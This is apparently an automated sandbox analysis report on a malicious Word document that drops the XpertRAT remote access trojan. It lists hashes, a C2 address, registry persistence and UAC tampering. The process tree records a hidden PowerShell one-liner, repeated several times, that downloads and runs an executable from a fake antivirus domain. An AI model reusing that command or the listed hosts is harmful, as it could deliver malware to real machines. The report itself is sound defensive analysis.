Analysis
- max time kernel: 149s
- max time network: 151s
- platform: windows7_x64
- resource: win7-en
- submitted: 16-09-2021 15:12
Static task: static1
Behavioral task: behavioral1
- Sample: PO sept2116 FRP-SHM.doc
- Resource: win7-en
Behavioral task: behavioral2
- Sample: PO sept2116 FRP-SHM.doc
- Resource: win10v20210408
General
- Target: PO sept2116 FRP-SHM.doc
- Size: 341KB
- MD5: dc9a33a35b76796e46c64dd1b464b12f
- SHA1: a235e802a62465a8985af532730d89e60f17f982
- SHA256: 39f9e4df37b9d4b3e5ad5df753c9e8c3617472f3cfa778e43ddd822544455788
- SHA512: f07653cea29668a76197ae59c5ca7e918517d068a5050df4a5bd1d3261a1451df7d164c197151a9c0dbd61b697c66054b9383d7b92a3c73925ad1bfaacc07f94
Malware Config
Extracted
- httP://esetnode32-antiviru.ydns.eu/EXCEL.exe
Extracted
- Family: xpertrat
- Version: 3.0.10
- Test
- C2: kapasky-antivirus.firewall-gateway.net:4000
- L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0
Signatures

Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
| description | pid | pid_target | process | target process |
|---|---|---|---|---|
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1212 | 1316 | powershell.exe | WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1636 | 1316 | powershell.exe | WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1904 | 1316 | powershell.exe | WINWORD.EXE |
XpertRAT Core Payload (2 IoCs)
Processes:
| resource | yara_rule |
|---|---|
| behavioral1/memory/2020-128-0x0000000000400000-0x0000000000443000-memory.dmp | xpertrat |
| behavioral1/memory/2020-129-0x0000000000401364-mapping.dmp | xpertrat |
Adds policy Run key to start application (2 TTPs, 2 IoCs)
Processes:
| description | ioc | process |
|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run | iexplore.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" | iexplore.exe |
Blocklisted process makes network request (1 IoCs)
Processes:
| flow | pid | process |
|---|---|---|
| 7 | 1212 | powershell.exe |
Downloads MZ/PE file
Executes dropped EXE (5 IoCs)
Processes:
| pid | process |
|---|---|
| 684 | EXCEL.exe |
| 1748 | EXCEL.exe |
| 1796 | EXCEL.exe |
| 1644 | EXCEL.exe |
| 1632 | EXCEL.exe |
Loads dropped DLL (6 IoCs)
Processes:
| pid | process |
|---|---|
| 1212 | powershell.exe |
| 1636 | powershell.exe |
| 1904 | powershell.exe |
| 684 | EXCEL.exe |
| 1796 | EXCEL.exe |
| 1796 | EXCEL.exe |
Windows security modification
Processes:
| description | ioc | process |
|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" | EXCEL.exe |
Adds Run key to start application (2 TTPs, 4 IoCs)
Processes:
| description | ioc | process |
|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | iexplore.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" | iexplore.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | iexplore.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" | iexplore.exe |
Checks whether UAC is enabled
Processes:
| description | ioc | process |
|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EXCEL.exe |
Suspicious use of SetThreadContext (3 IoCs)
Processes:
| description | pid | process | target process |
|---|---|---|---|
| PID 684 set thread context of 1632 | 684 | EXCEL.exe | EXCEL.exe |
| PID 1796 set thread context of 324 | 1796 | EXCEL.exe | EXCEL.exe |
| PID 1632 set thread context of 2020 | 1632 | EXCEL.exe | iexplore.exe |
Drops file in Windows directory (1 IoCs)
Processes:
| description | ioc | process |
|---|---|---|
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE |
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Processes:
| description | ioc | process |
|---|---|---|
| Set value (int) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE |
| Key created | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE |
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes:
| pid | process |
|---|---|
| 1316 | WINWORD.EXE |
Suspicious behavior: EnumeratesProcesses (23 IoCs)
Processes (identical entries collapsed; the last column gives how many times each appears):
| pid | process | entries |
|---|---|---|
| 1212 | powershell.exe | 3 |
| 1904 | powershell.exe | 3 |
| 1636 | powershell.exe | 3 |
| 296 | powershell.exe | 1 |
| 1980 | powershell.exe | 1 |
| 684 | EXCEL.exe | 2 |
| 1796 | EXCEL.exe | 6 |
| 1632 | EXCEL.exe | 4 |
Suspicious use of AdjustPrivilegeToken (9 IoCs)
Processes:
| description | pid | process |
|---|---|---|
| Token: SeDebugPrivilege | 1212 | powershell.exe |
| Token: SeDebugPrivilege | 1904 | powershell.exe |
| Token: SeDebugPrivilege | 1636 | powershell.exe |
| Token: SeDebugPrivilege | 1748 | EXCEL.exe |
| Token: SeDebugPrivilege | 1796 | EXCEL.exe |
| Token: SeDebugPrivilege | 684 | EXCEL.exe |
| Token: SeDebugPrivilege | 296 | powershell.exe |
| Token: SeDebugPrivilege | 1980 | powershell.exe |
| Token: SeDebugPrivilege | 2020 | iexplore.exe |
Suspicious use of SetWindowsHookEx (6 IoCs)
Processes (identical entries collapsed; the last column gives how many times each appears):
| pid | process | entries |
|---|---|---|
| 1316 | WINWORD.EXE | 4 |
| 1632 | EXCEL.exe | 1 |
| 2020 | iexplore.exe | 1 |
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (identical entries collapsed; the last column gives how many times each appears):
| description | pid | process | target process | entries |
|---|---|---|---|---|
| PID 1316 wrote to memory of 1212 | 1316 | WINWORD.EXE | powershell.exe | 4 |
| PID 1212 wrote to memory of 684 | 1212 | powershell.exe | EXCEL.exe | 7 |
| PID 1316 wrote to memory of 1636 | 1316 | WINWORD.EXE | powershell.exe | 4 |
| PID 1316 wrote to memory of 1904 | 1316 | WINWORD.EXE | powershell.exe | 4 |
| PID 1636 wrote to memory of 1748 | 1636 | powershell.exe | EXCEL.exe | 7 |
| PID 1904 wrote to memory of 1796 | 1904 | powershell.exe | EXCEL.exe | 7 |
| PID 1796 wrote to memory of 296 | 1796 | EXCEL.exe | powershell.exe | 4 |
| PID 1748 wrote to memory of 1612 | 1748 | EXCEL.exe | powershell.exe | 4 |
| PID 684 wrote to memory of 1980 | 684 | EXCEL.exe | powershell.exe | 4 |
| PID 1316 wrote to memory of 2016 | 1316 | WINWORD.EXE | splwow64.exe | 4 |
| PID 1796 wrote to memory of 1644 | 1796 | EXCEL.exe | EXCEL.exe | 7 |
| PID 684 wrote to memory of 1632 | 684 | EXCEL.exe | EXCEL.exe | 8 |
System policy modification (1 TTPs, 1 IoCs)
Processes:
| description | ioc | process |
|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | EXCEL.exe |
Processes
(Process tree; indentation and the bracketed number give the depth. Each entry lists the image path, the command line as recorded, and the signatures hit by that process.)

[1] C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO sept2116 FRP-SHM.doc"
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
        - Process spawned unexpected child process
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Roaming\EXCEL.exe
            Command line: "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
                (the -enc argument is base64-encoded UTF-16LE and decodes to: Start-Sleep -s 20)
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [4] C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                - Executes dropped EXE
                - Windows security modification
                - Checks whether UAC is enabled
                - Suspicious use of SetThreadContext
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of SetWindowsHookEx
                - System policy modification

                [5] C:\Program Files (x86)\Internet Explorer\iexplore.exe
                    Command line: C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                    - Adds policy Run key to start application
                    - Adds Run key to start application
                    - Suspicious use of AdjustPrivilegeToken
                    - Suspicious use of SetWindowsHookEx

                    [6] C:\Windows\SysWOW64\notepad.exe
                        Command line: notepad.exe

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
        - Process spawned unexpected child process
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Roaming\EXCEL.exe
            Command line: "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
                (the -enc argument is base64-encoded UTF-16LE and decodes to: Start-Sleep -s 20)

    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
        - Process spawned unexpected child process
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Roaming\EXCEL.exe
            Command line: "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
                (the -enc argument is base64-encoded UTF-16LE and decodes to: Start-Sleep -s 20)
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            [4] C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                - Executes dropped EXE

            [4] C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
                Command line: C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

    [2] C:\Windows\splwow64.exe
        Command line: C:\Windows\splwow64.exe 12288
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
  MD5: 230811e776cb540cbc2a06fe4adaf339
  SHA1: d679baca39696f690213099869bf6efc1cc8c560
  SHA256: 99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
  SHA512: c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
- C:\Users\Admin\AppData\Roaming\EXCEL.exe
  MD5: 230811e776cb540cbc2a06fe4adaf339
  SHA1: d679baca39696f690213099869bf6efc1cc8c560
  SHA256: 99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd
  SHA512: c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: c76ec9954800eb464c7c885dd79bd4c5
  SHA1: 5668d6f08b21f614b090372be8e0e82fb4e2a020
  SHA256: 71e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc
  SHA512: fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc